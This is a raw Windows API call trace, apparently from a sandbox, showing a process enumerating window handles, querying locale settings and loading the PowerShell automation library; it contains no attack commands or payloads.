	[0613.848] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xdc8
	[0613.848] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xc18
	[0613.848] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xc2c
	[0613.848] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xa1c
	[0613.848] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1244
	[0613.849] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xdb0
	[0613.849] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1398
	[0613.849] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1358
	[0613.849] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1370
	[0613.849] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1340
	[0613.849] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x130c
	[0613.849] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x12c0
	[0613.849] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x12e4
	[0613.849] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1270
	[0613.849] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1298
	[0613.850] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x120c
	[0613.850] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x122c
	[0613.850] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x11c4
	[0613.850] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x11b0
	[0613.850] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1188
	[0613.850] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1148
	[0613.850] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1160
	[0613.850] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x10fc
	[0613.850] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xe34
	[0613.850] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xea4
	[0613.850] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x514
	[0613.851] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xe48
	[0613.851] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xbc8
	[0613.851] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xdf8
	[0613.851] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x318
	[0613.851] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xcac
	[0613.851] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x8bc
	[0613.851] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xf9c
	[0613.851] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xf48
	[0613.851] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xe40
	[0613.851] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xecc
	[0613.852] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xeb8
	[0613.852] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xe80
	[0613.852] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xe98
	[0613.852] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xe60
	[0613.852] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xee4
	[0613.852] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xf00
	[0613.852] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xdf0
	[0613.852] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xe1c
	[0613.852] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xdd0
	[0613.852] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xd94
	[0613.853] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xd74
	[0613.853] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xd00
	[0613.853] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xcd8
	[0613.853] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xc84
	[0613.853] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xca4
	[0613.853] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xc64
	[0613.853] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xc24
	[0613.853] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xb84
	[0613.853] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xbac
	[0613.853] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x384
	[0613.853] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xab8
	[0613.854] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x33c
	[0613.854] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xa44
	[0613.854] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xa64
	[0613.854] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x8a8
	[0613.854] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xaf0
	[0613.854] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x88c
	[0613.854] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xb04
	[0613.854] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x910
	[0613.854] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x230
	[0613.854] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xac0
	[0613.855] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xab4
	[0613.855] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xaac
	[0613.855] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x3d0
	[0613.855] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x978
	[0613.855] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xa7c
	[0613.855] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x59c
	[0613.855] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xa88
	[0613.855] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xa6c
	[0613.855] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xa68
	[0613.855] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x9f8
	[0613.855] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xa04
	[0613.856] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x924
	[0613.856] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x8dc
	[0613.856] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x7dc
	[0613.856] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x768
	[0613.856] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x764
	[0613.856] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x820
	[0613.856] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x810
	[0613.856] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x794
	[0613.856] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x83c
	[0613.856] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x7ac
	[0613.857] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xb44
	[0613.857] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xb5c
	[0613.857] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x838
	[0613.857] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.857] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.857] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.857] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.857] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.857] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.857] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.858] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.858] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x818
	[0613.858] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x5b8
	[0613.858] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x494
	[0613.858] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1ec
	[0613.858] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x440
	[0613.858] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x7e8
	[0613.858] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x730
	[0613.858] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x2c8
	[0613.858] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x31c
	[0613.858] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x330
	[0613.859] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x128
	[0613.859] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x5c8
	[0613.859] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x6f8
	[0613.859] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x358
	[0613.859] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x73c
	[0613.859] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xb0
	[0613.859] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x250
	[0613.859] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x240
	[0613.859] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x790
	[0613.859] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x61c
	[0613.860] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x540
	[0613.860] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x538
	[0613.860] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x568
	[0613.860] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x538
	[0613.860] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x568
	[0613.860] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x538
	[0613.860] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x540
	[0613.860] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x540
	[0613.860] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x57c
	[0613.860] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x460
	[0613.860] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x554
	[0613.861] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.861] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x528
	[0613.861] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.861] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.861] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.861] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x79c
	[0613.861] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.861] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4e0
	[0613.861] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.861] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x460
	[0613.862] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x460
	[0613.862] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x44c
	[0613.862] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x778
	[0613.862] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x460
	[0613.862] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x558
	[0613.862] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.862] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.862] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1bb4
	[0613.862] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x10bc
	[0613.862] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1b50
	[0613.862] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x14b4
	[0613.863] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x149c
	[0613.863] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x14a8
	[0613.863] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1490
	[0613.864] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x14a4
	[0613.864] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x148c
	[0613.864] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1458
	[0613.864] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1b4c
	[0613.864] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1b3c
	[0613.864] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x19bc
	[0613.864] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x199c
	[0613.865] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1998
	[0613.865] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1994
	[0613.865] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1990
	[0613.865] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1984
	[0613.865] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x197c
	[0613.872] WerSetFlags () returned 0x0
	[0614.939] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0614.939] CoTaskMemFree (pv=0x0) 
	[0614.940] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x26dee8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x26dee0 | out: pulNumLanguages=0x26dee8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x26dee0) returned 1
	[0614.941] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x26dee8, pwszLanguagesBuffer=0x2bc71b8, pcchLanguagesBuffer=0x26dee0 | out: pulNumLanguages=0x26dee8, pwszLanguagesBuffer=0x2bc71b8, pcchLanguagesBuffer=0x26dee0) returned 1
	[0614.946] CoTaskMemAlloc (cb=0x24) returned 0x4500d0
	[0614.946] GetUserDefaultLocaleName (in: lpLocaleName=0x4500d0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0614.947] CoTaskMemFree (pv=0x4500d0) 
	[0615.790] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0615.790] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0615.790] CoTaskMemFree (pv=0x4444f0) 
	[0615.793] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0615.793] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0615.793] CoTaskMemFree (pv=0x4444f0) 
	[0615.795] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0615.795] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0615.795] CoTaskMemFree (pv=0x4444f0) 
	[0615.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.806] SetErrorMode (uMode=0x1) returned 0x1
	[0615.806] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x26db60 | out: lpFileInformation=0x26db60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0615.807] SetErrorMode (uMode=0x1) returned 0x1
	[0615.807] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x26ddd0 | out: lpdwHandle=0x26ddd0) returned 0x94c
	[0615.808] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bcaa48 | out: lpData=0x2bcaa48) returned 1
	[0615.809] VerQueryValueW (in: pBlock=0x2bcaa48, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26dd48, puLen=0x26dd40 | out: lplpBuffer=0x26dd48*=0x2bcaae4, puLen=0x26dd40) returned 1
	[0615.809] VerQueryValueW (in: pBlock=0x2bcaa48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x26dcb8, puLen=0x26dcb0 | out: lplpBuffer=0x26dcb8*=0x2bcabc0, puLen=0x26dcb0) returned 1
	[0615.809] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0615.809] CoTaskMemAlloc (cb=0x2e) returned 0x456810
	[0615.809] lstrcpyW (in: lpString1=0x456810, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0615.809] CoTaskMemFree (pv=0x456810) 
